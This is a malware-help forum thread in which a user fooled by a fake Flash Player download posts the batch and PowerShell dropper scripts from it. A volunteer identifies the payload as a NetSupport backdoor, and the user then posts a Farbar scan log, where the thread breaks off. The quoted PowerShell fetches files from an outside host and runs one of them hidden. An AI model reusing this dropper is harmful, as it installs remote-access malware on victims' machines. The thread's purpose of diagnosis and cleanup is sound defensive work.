Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

Was Fooled Into Downloading Fake Flash Player File


  • This topic is locked This topic is locked
7 replies to this topic

#1 zengotten

zengotten

  • Members
  • 3 posts
  • OFFLINE
  •  
  • Local time:08:36 PM

Posted 19 October 2016 - 06:44 PM

A Steam user sent me a message with a link to a fake video sharing site, it's made to fool you into downloading a fake flash player install file.

 

I downloaded the file and ran it thinking that maybe my flash player was out of date, I wasn't thinking.

 

I reached behind my computer and unplugged the power when I saw that it opened up a command prompt window. I know this is bad for my computer but it was the fastest way to stop the malicious file from doing whatever it was doing. I don't know if I stopped it in time.

 

I looked at the site later and found out that all of the links on the page just loop back to the same address every time and the flash player file was being downloaded from someone's dropbox account.

 

I looked at the file more closely and found it is a hidden .zip file that contains two files:

devmdn.ps1
dvstrb.bat

The contents of the two files when viewed through notepad++ are as follows:

dvstrb.bat

@echo off
start powershell.exe -windowstyle hidden -executionpolicy bypass -file devmdn.ps1
ping 127.0.0.1 -n 3
devmdn.ps1

$CheckFile = Test-Path "$env:APPDATA/pqs.bin"
if ($CheckFile) {exit}
1 > "$env:APPDATA/pqs.bin"
$down = New-Object System.Net.WebClient
$url48  = "http://avat.pw/me/zsc";
$url58  = "http://avat.pw/me/apparchdv";
$url68  = "http://avat.pw/me/netvcst";
$file48 = "$env:APPDATA/zsc.exe";
$file58 = "$env:APPDATA/apparchdv";
$file68 = "$env:APPDATA/netvcst.cmd";
$down.DownloadFile($url48,$file48);
$down.DownloadFile($url58,$file58);
$down.DownloadFile($url68,$file68);
$exec = New-Object -com shell.application
$exec.shellexecute($file68, "", "", "open", 0);

I do not know if these files had enough time to fully execute, would someone here be kind enough to look into this and help me ensure that I have not been infected and no damage has been done?



BC AdBot (Login to Remove)

 


#2 Aura

Aura

    Bleepin' Special Ops


  • Malware Response Team
  • 19,683 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:11:36 PM

Posted 19 October 2016 - 08:41 PM

Hi zengotten :)

My name is Aura and I'll be assisting you with your malware issue. Since we'll be working together, you can call me Aura or Yoan, which is my real name, it's up to you! Now that we've broke the ice, I'll just ask you a few things during the time we'll be working together to clean your system and get it back to an operational state.
  • As you'll notice, the logs we are asking for here are quite lenghty, so it's normal for me to not reply exactly after you post them. This is because I need some time to analyse them and then act accordingly. However, I'll always reply within 24 hours, 48 hours at most if something unexpected happens;
  • As long as I'm assisting you on BleepingComputer, in this thread, I'll ask you to not seek assistance anywhere else for any issue related to the system we are working on. If you have an issue, question, etc. about your computer, please ask it in this thread and I'll assist you;
  • The same principle applies to any modifications you make to your system, I would like you to ask me before you do any manipulations that aren't in the instructions I posted. This is to ensure that we are operating in sync and I know exactly what's happening on your system;
  • If you aren't sure about an instruction I'm giving you, ask me about it. This is to ensure that the clean-up process goes without any issue. I'll answer you and even give you more precise instructions/explanations if you need. There's no shame in asking questions here, better be safe than sorry!;
  • If you don't reply to your thread within 3 days, I'll bump this thread to let you know that I'm waiting for you. If you don't reply after 5 days, it'll be closed. If you return after that period, you can send me a PM to get it unlocked and we'll continue where we left off;
  • Since malware can work quickly, we want to get rid of them as fast as we can, before they make unknown changes to the system. This being said, I would appreciate if you could reply to this thread within 24 hours of me posting. This way, we'll have a good clean-up rhythm and the chances of complications will be reduced;
  • I'm against any form of pirated, illegal and counterfeit software and material. So if you have any installed on your system, I'll ask you to uninstall them right now. You don't have to tell me if you indeed had some or not, I'll give you the benefit of the doubt. Plus, this would be against BleepingComputer's rules;
  • In the end, you are the one asking for assistance here. So if you wish to go a different way during the clean-up, like format and reinstall Windows, you are free to do so. I would appreciate you to let me know about it first, and if you need, I can also assist you in the process;
  • I would appreciate if you were to stay with me until the end, which means, until I declare your system clean. Just because your system isn't behaving weirdly anymore, or is running better than before, it doesn't mean that the infection is completely gone;
    This being said, I have a full time job so sometimes it'll take longer for me to reply to you. Don't worry, you'll be my first priority as soon as I get home and have time to look at your thread;
This being said, it's time to clean-up some malware, so let's get started, shall we? :)

I analysed the payload hosted on avat.pw, and it turns out to be a NetSupport Manager client. apparchdv is a password-protected 7-Zip archive containing all the files, zsc is a renamed 7za.exe (7-Zip command line executable) used to decompress apparchdv and netvcst is a batch script used for the deployment of the client on the system. In other words, this is a backdoor trojan infection, so your system have most likely been compromised.

Since I have the full installation script, I can see whether or not the install succeeded. Follow the instructions in the thread below to run FRST and provide me the content of both logs (FRST.txt and Addition.txt).

http://www.bleepingcomputer.com/forums/topic34773.html

unite_blue.png
Security Administrator | Sysnative Windows Update Senior Analyst | Malware Hunter | @SecurityAura
My timezone UTC-05:00 (East. Coast). If I didn't reply to you within 48 hours, please send me a PM.


#3 zengotten

zengotten
  • Topic Starter

  • Members
  • 3 posts
  • OFFLINE
  •  
  • Local time:08:36 PM

Posted 19 October 2016 - 09:23 PM

Thank you very much! Here are the logs:

 

FRST.txt

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 17-10-2016
Ran by King (administrator) on KING-PC (19-10-2016 19:20:02)
Running from C:\Users\King\Desktop
Loaded Profiles: King (Available Profiles: King)
Platform: Windows 7 Ultimate Service Pack 1 (X64) Language: English (United States)
Internet Explorer Version 8 (Default browser: Chrome)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\MsMpEng.exe
(Creative Technology Ltd) C:\Program Files (x86)\Creative\Shared Files\CTAudSvc.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(Dropbox, Inc.) C:\Windows\System32\DbxSvc.exe
(DTS) C:\Program Files\Realtek\Audio\HDA\DTSAudioService64.exe
(Logitech Inc.) C:\Program Files\Logitech Gaming Software\Drivers\APOService\LogiRegistryService.exe
(Microsoft Corporation) C:\Program Files\Microsoft SQL Server\MSSQL10.SQLEXPRESS\MSSQL\Binn\sqlservr.exe
() C:\Program Files (x86)\Oculus\Service\OVRServiceLauncher.exe
() C:\Windows\System32\PnkBstrA.exe
(iZ3D Inc.) C:\Program Files (x86)\iZ3D Driver\Win64\S3DCService.exe
(Microsoft Corporation) C:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(iZ3D Inc.) C:\Program Files (x86)\iZ3D Driver\Win32\S3DCService.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\NisSrv.exe
() C:\Program Files (x86)\Oculus\Service\OVRServer_x64.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\msseces.exe
(Logitech Inc.) C:\Program Files\Logitech Gaming Software\LCore.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
() C:\Users\King\Downloads\cpk_05\CPKeeper.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.31.5\GoogleCrashHandler.exe
(Creative Technology Ltd) C:\Windows\SysWOW64\CTHELPER.EXE
(Dropbox, Inc.) C:\Program Files (x86)\Dropbox\Client\Dropbox.exe
(Creative Technology Ltd) C:\Windows\SysWOW64\Ctxfihlp.exe
(Oculus VR, LLC) C:\Program Files (x86)\Oculus\Tools\OculusConfigUtil.exe
(Creative Technology Ltd) C:\Windows\SysWOW64\CTxfispi.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.31.5\GoogleCrashHandler64.exe
(JimsApps) D:\Program Files (x86)\Snaz\Snaz.exe
(Cerulean Studios) D:\Program Files (x86)\Trillian\trillian.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Valve Corporation) D:\Program Files (x86)\steam\Steam.exe
(Valve Corporation) D:\Program Files (x86)\steam\bin\cef\cef.winxp\steamwebhelper.exe
(Valve Corporation) C:\Program Files (x86)\Common Files\Steam\SteamService.exe
(Valve Corporation) D:\Program Files (x86)\steam\bin\cef\cef.winxp\steamwebhelper.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe


==================== Registry (Whitelisted) ====================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [MSC] => C:\Program Files\Microsoft Security Client\msseces.exe [1354712 2016-08-30] (Microsoft Corporation)
HKLM\...\Run: [Launch LCore] => C:\Program Files\Logitech Gaming Software\LCore.exe [15003256 2015-09-19] (Logitech Inc.)
HKLM\...\Run: [NvBackend] => "C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe"
HKLM\...\Run: [RtHDVBg_DTS] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [1361112 2013-11-05] (Realtek Semiconductor)
HKLM-x32\...\Run: [AsioThk32Reg] => REGSVR32.EXE /S CTASIO.DLL
HKLM-x32\...\Run: [CTHelper] => c:\windows\system32\CTHELPER.EXE [28672 2007-03-05] (Creative Technology Ltd)
HKLM-x32\...\Run: [Dropbox] => C:\Program Files (x86)\Dropbox\Client\Dropbox.exe [25366584 2016-10-10] (Dropbox, Inc.)
HKLM-x32\...\Run: [CTxfiHlp] => c:\windows\system32\CTXFIHLP.EXE [26624 2007-03-05] (Creative Technology Ltd)
HKU\S-1-5-21-1771700083-1338792134-2885675772-1001\...\Run: [Color Profile Keeper] => C:\Users\King\Downloads\cpk_05\CPKeeper.exe [7922176 2013-07-13] ()
ShellIconOverlayIdentifiers: [ DropboxExt1] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.65536.dll [2016-10-10] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt10] -> {FB314EE2-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.65536.dll [2016-10-10] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt2] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.65536.dll [2016-10-10] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt3] -> {FB314EDD-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.65536.dll [2016-10-10] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt4] -> {FB314EDE-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.65536.dll [2016-10-10] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt5] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.65536.dll [2016-10-10] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt6] -> {FB314EDF-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.65536.dll [2016-10-10] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt7] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.65536.dll [2016-10-10] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt8] -> {FB314EE0-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.65536.dll [2016-10-10] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt9] -> {FB314EE1-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.65536.dll [2016-10-10] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt1] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.65536.dll [2016-10-10] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt10] -> {FB314EE2-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.65536.dll [2016-10-10] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt2] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.65536.dll [2016-10-10] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt3] -> {FB314EDD-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.65536.dll [2016-10-10] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt4] -> {FB314EDE-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.65536.dll [2016-10-10] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt5] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.65536.dll [2016-10-10] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt6] -> {FB314EDF-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.65536.dll [2016-10-10] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt7] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.65536.dll [2016-10-10] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt8] -> {FB314EE0-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.65536.dll [2016-10-10] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt9] -> {FB314EE1-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.65536.dll [2016-10-10] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [DropboxExt1] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.65536.dll [2016-10-10] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [DropboxExt2] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.65536.dll [2016-10-10] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [DropboxExt3] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.65536.dll [2016-10-10] (Dropbox, Inc.)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\OculusConfigUtil.lnk [2015-02-02]
ShortcutTarget: OculusConfigUtil.lnk -> C:\Program Files (x86)\Oculus\Tools\OculusConfigUtil.exe (Oculus VR, LLC)
Startup: C:\Users\King\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OBS Multiplatform.lnk [2015-11-28]
ShortcutTarget: OBS Multiplatform.lnk -> C:\Windows\System32\cmd.exe (Microsoft Corporation)
Startup: C:\Users\King\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Snaz.exe - Shortcut.lnk [2015-11-08]
ShortcutTarget: Snaz.exe - Shortcut.lnk -> D:\Program Files (x86)\Snaz\Snaz.exe (JimsApps)
Startup: C:\Users\King\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Trillian.lnk [2015-08-01]
ShortcutTarget: Trillian.lnk -> D:\Program Files (x86)\Trillian\trillian.exe (Cerulean Studios)
GroupPolicyScripts: Restriction <======= ATTENTION

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\..\Interfaces\{11636072-0BBA-48C9-AEEE-73D6482B18FF}: [DhcpNameServer] 192.168.0.1
Tcpip\..\Interfaces\{1DFE6D25-1D28-4AAE-992B-B21EF9F2AD28}: [DhcpNameServer] 192.168.0.1
Tcpip\..\Interfaces\{A8228829-EC5F-4643-9EBC-3CC28D588877}: [DhcpNameServer] 192.168.0.1
Tcpip\..\Interfaces\{EF2FD45A-2E40-4754-BBA6-912EAF653182}: [NameServer] 8.8.8.8,8.8.4.4
ManualProxies: 

Internet Explorer:
==================
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
HKU\S-1-5-21-1771700083-1338792134-2885675772-1001\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=msnhome
HKU\S-1-5-21-1771700083-1338792134-2885675772-1001\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
SearchScopes: HKLM-x32 -> DefaultScope {1032E68A-D948-4F15-89A3-5E2DA7119F3F} URL = 
SearchScopes: HKU\.DEFAULT -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
BHO: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre7\bin\ssv.dll [2015-03-19] (Oracle Corporation)
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2012-07-17] (Microsoft Corp.)
BHO: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre7\bin\jp2ssv.dll [2015-03-19] (Oracle Corporation)
BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre7\bin\ssv.dll [2014-07-11] (Oracle Corporation)
BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2012-07-17] (Microsoft Corp.)
BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll [2014-07-11] (Oracle Corporation)
DPF: HKLM {AA570693-00E2-4907-B6F1-60A1199B030C} hxxps://juniper.net/dana-cached/sc/JuniperSetupClient64.cab
DPF: HKLM-x32 {D4B68B83-8710-488B-A692-D74B50BA558E} hxxp://ccfiles.creative.com/Web/softwareupdate/ocx/15113/CTPIDPDE.cab
DPF: HKLM-x32 {E705A591-DA3C-4228-B0D5-A356DBA42FBF} hxxp://ccfiles.creative.com/Web/softwareupdate/su2/ocx/20015/CTSUEng.cab
DPF: HKLM-x32 {F27237D7-93C8-44C2-AC6E-D6057B9A918F} hxxps://juniper.net/dana-cached/sc/JuniperSetupClient.cab
DPF: HKLM-x32 {F6ACF75C-C32C-447B-9BEF-46B766368D29} hxxp://ccfiles.creative.com/Web/softwareupdate/ocx/130321/CTPID.cab
Filter: deflate - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\system32\urlmon.dll [2015-12-10] (Microsoft Corporation)
Filter-x32: deflate - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\SysWOW64\urlmon.dll [2015-12-10] (Microsoft Corporation)
Filter: gzip - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\system32\urlmon.dll [2015-12-10] (Microsoft Corporation)
Filter-x32: gzip - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\SysWOW64\urlmon.dll [2015-12-10] (Microsoft Corporation)

FireFox:
========
FF ProfilePath: C:\Users\King\AppData\Roaming\Mozilla\Firefox\Profiles\t7xymp7a.default [2016-10-19]
FF DefaultSearchEngine: Mozilla\Firefox\Profiles\t7xymp7a.default -> Google
FF DefaultSearchEngine.US: Mozilla\Firefox\Profiles\t7xymp7a.default -> Google
FF Homepage: Mozilla\Firefox\Profiles\t7xymp7a.default -> www.google.com
FF Extension: (Bookmark Autohider) - C:\Users\King\AppData\Roaming\Mozilla\Firefox\Profiles\t7xymp7a.default\Extensions\bookmarkhider@exi.name.xpi [2016-05-02]
FF Extension: (United States English Spellchecker) - C:\Users\King\AppData\Roaming\Mozilla\Firefox\Profiles\t7xymp7a.default\Extensions\en-US@dictionaries.addons.mozilla.org [2016-03-19]
FF Extension: (Facebook Disconnect) - C:\Users\King\AppData\Roaming\Mozilla\Firefox\Profiles\t7xymp7a.default\Extensions\facebook@disconnect.me.xpi [2016-05-02]
FF Extension: (Firefox Hotfix) - C:\Users\King\AppData\Roaming\Mozilla\Firefox\Profiles\t7xymp7a.default\Extensions\firefox-hotfix@mozilla.org.xpi [2016-08-31]
FF Extension: (Lazarus: Form Recovery) - C:\Users\King\AppData\Roaming\Mozilla\Firefox\Profiles\t7xymp7a.default\Extensions\lazarus@interclue.com.xpi [2016-05-02]
FF Extension: (Metal Watcher) - C:\Users\King\AppData\Roaming\Mozilla\Firefox\Profiles\t7xymp7a.default\Extensions\metalwatcher@kgmoney.net.xpi [2016-05-02]
FF Extension: (Movable Firefox Button) - C:\Users\King\AppData\Roaming\Mozilla\Firefox\Profiles\t7xymp7a.default\Extensions\movableAppButton@Merci.chao.xpi [2015-05-28]
FF Extension: (Classic Compact Options) - C:\Users\King\AppData\Roaming\Mozilla\Firefox\Profiles\t7xymp7a.default\Extensions\notreal.ccoptions@environmentalchemistry.com.xpi [2015-05-26]
FF Extension: (Restart Button) - C:\Users\King\AppData\Roaming\Mozilla\Firefox\Profiles\t7xymp7a.default\Extensions\restartbutton@strk.jp.xpi [2016-05-02]
FF Extension: (Save Session) - C:\Users\King\AppData\Roaming\Mozilla\Firefox\Profiles\t7xymp7a.default\Extensions\savesession@noasobi.net.xpi [2016-05-02]
FF Extension: (TinEye Reverse Image Search) - C:\Users\King\AppData\Roaming\Mozilla\Firefox\Profiles\t7xymp7a.default\Extensions\tineye@ideeinc.com.xpi [2016-09-08]
FF Extension: (Yet Another Smooth Scrolling) - C:\Users\King\AppData\Roaming\Mozilla\Firefox\Profiles\t7xymp7a.default\Extensions\yetanothersmoothscrolling@kataho.xpi [2016-05-02]
FF Extension: (Flagfox) - C:\Users\King\AppData\Roaming\Mozilla\Firefox\Profiles\t7xymp7a.default\Extensions\{1018e4d6-728f-4b20-ad56-37578a4de76b}.xpi [2016-10-14]
FF Extension: (Image Zoom) - C:\Users\King\AppData\Roaming\Mozilla\Firefox\Profiles\t7xymp7a.default\Extensions\{1A2D0EC4-75F5-4c91-89C4-3656F6E44B68}.xpi [2016-05-02]
FF Extension: (ScrapBook) - C:\Users\King\AppData\Roaming\Mozilla\Firefox\Profiles\t7xymp7a.default\Extensions\{53A03D43-5363-4669-8190-99061B2DEBA5}.xpi [2016-09-08]
FF Extension: (Compact Menu 2) - C:\Users\King\AppData\Roaming\Mozilla\Firefox\Profiles\t7xymp7a.default\Extensions\{57068FBE-1506-42ee-AB02-BD183E7999E4}.xpi [2016-05-02]
FF Extension: (No Name) - C:\Users\King\AppData\Roaming\Mozilla\Firefox\Profiles\t7xymp7a.default\Extensions\{5d9968c3-101c-4944-ba71-72d77393322d}.oldbackup [2014-05-09] [not signed]
FF Extension: (NoScript) - C:\Users\King\AppData\Roaming\Mozilla\Firefox\Profiles\t7xymp7a.default\Extensions\{73a6fe31-595d-460b-a920-fcc0f8843232}.xpi [2016-08-19]
FF Extension: (Work Offline) - C:\Users\King\AppData\Roaming\Mozilla\Firefox\Profiles\t7xymp7a.default\Extensions\{761a54f1-8ccf-4112-9e48-dbf72adf6244}.xpi [2016-05-02]
FF Extension: (IE Tab) - C:\Users\King\AppData\Roaming\Mozilla\Firefox\Profiles\t7xymp7a.default\Extensions\{77b819fa-95ad-4f2c-ac7c-486b356188a9} [2016-05-02]
FF Extension: (Live IP Address) - C:\Users\King\AppData\Roaming\Mozilla\Firefox\Profiles\t7xymp7a.default\Extensions\{7C9AE782-DB21-4e40-81FB-AD8A53A6233A} [2015-09-22]
FF Extension: (Mozilla Archive Format) - C:\Users\King\AppData\Roaming\Mozilla\Firefox\Profiles\t7xymp7a.default\Extensions\{7f57cf46-4467-4c2d-adfa-0cba7c507e54}.xpi [2016-06-13]
FF Extension: (Live HTTP headers) - C:\Users\King\AppData\Roaming\Mozilla\Firefox\Profiles\t7xymp7a.default\Extensions\{8f8fe09b-0bd3-4470-bc1b-8cad42b8203a} [2016-05-02]
FF Extension: (FireFTP) - C:\Users\King\AppData\Roaming\Mozilla\Firefox\Profiles\t7xymp7a.default\Extensions\{a7c6cf7f-112c-4500-a7ea-39801a327e5f} [2016-06-22]
FF Extension: (Password Exporter) - C:\Users\King\AppData\Roaming\Mozilla\Firefox\Profiles\t7xymp7a.default\Extensions\{B17C1C5A-04B1-11DB-9804-B622A1EF5492}.xpi [2016-04-06]
FF Extension: (Smartest Bookmarks Bar) - C:\Users\King\AppData\Roaming\Mozilla\Firefox\Profiles\t7xymp7a.default\Extensions\{b442f4c0-c292-4998-aabe-48608a73ba75}.xpi [2012-11-17] [not signed]
FF Extension: (Download YouTube Videos as MP4) - C:\Users\King\AppData\Roaming\Mozilla\Firefox\Profiles\t7xymp7a.default\Extensions\{b9bfaf1c-a63f-47cd-8b9a-29526ced9060}.xpi [2016-09-08]
FF Extension: (Adblock Plus) - C:\Users\King\AppData\Roaming\Mozilla\Firefox\Profiles\t7xymp7a.default\Extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi [2016-05-01]
FF Extension: (BetterPrivacy) - C:\Users\King\AppData\Roaming\Mozilla\Firefox\Profiles\t7xymp7a.default\Extensions\{d40f5e7b-d2cf-4856-b441-cc613eeffbe3}.xpi [2016-05-28]
FF Extension: (Classic Compact) - C:\Users\King\AppData\Roaming\Mozilla\Firefox\Profiles\t7xymp7a.default\Extensions\{D46E8522-6E86-44b1-A622-58C0668AD78E}.xpi [2013-12-24] [not signed]
FF Extension: (Tab Mix Plus) - C:\Users\King\AppData\Roaming\Mozilla\Firefox\Profiles\t7xymp7a.default\Extensions\{dc572301-7619-498c-a57d-39143191b318}.xpi [2016-06-09]
FF HKLM-x32\...\Firefox\Extensions: [{F003DA68-8256-4b37-A6C4-350FA04494DF}] - C:\Program Files\Logitech\SetPointP\LogiSmoothFirefoxExt => not found
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_22_0_0_209.dll [2016-08-01] ()
FF Plugin: @esn/npbattlelog,version=2.6.2 -> C:\Program Files (x86)\Battlelog Web Plugins\2.6.2\npbattlelogx64.dll [2014-12-03] (EA Digital Illusions CE AB)
FF Plugin: @java.com/DTPlugin,version=10.75.2 -> C:\Program Files\Java\jre7\bin\dtplugin\npDeployJava1.dll [2015-03-19] (Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=10.75.2 -> C:\Program Files\Java\jre7\bin\plugin2\npjp2.dll [2015-03-19] (Oracle Corporation)
FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files\Microsoft Silverlight\5.1.50901.0\npctrl.dll [2016-08-31] ( Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_22_0_0_209.dll [2016-08-01] ()
FF Plugin-x32: @esn.me/esnsonar,version=0.70.4 -> C:\Program Files (x86)\Battlelog Web Plugins\Sonar\0.70.4\npesnsonar.dll [2011-11-03] (ESN Social Software AB)
FF Plugin-x32: @esn/esnlaunch,version=2.3.0 -> C:\Program Files (x86)\Battlelog Web Plugins\2.3.0\npesnlaunch.dll [2013-09-16] (ESN Social Software AB)
FF Plugin-x32: @esn/npbattlelog,version=2.6.2 -> C:\Program Files (x86)\Battlelog Web Plugins\2.6.2\npbattlelog.dll [2014-12-03] (EA Digital Illusions CE AB)
FF Plugin-x32: @Google.com/GoogleEarthPlugin -> C:\Program Files (x86)\Google\Google Earth\plugin\npgeplugin.dll [2015-05-21] (Google)
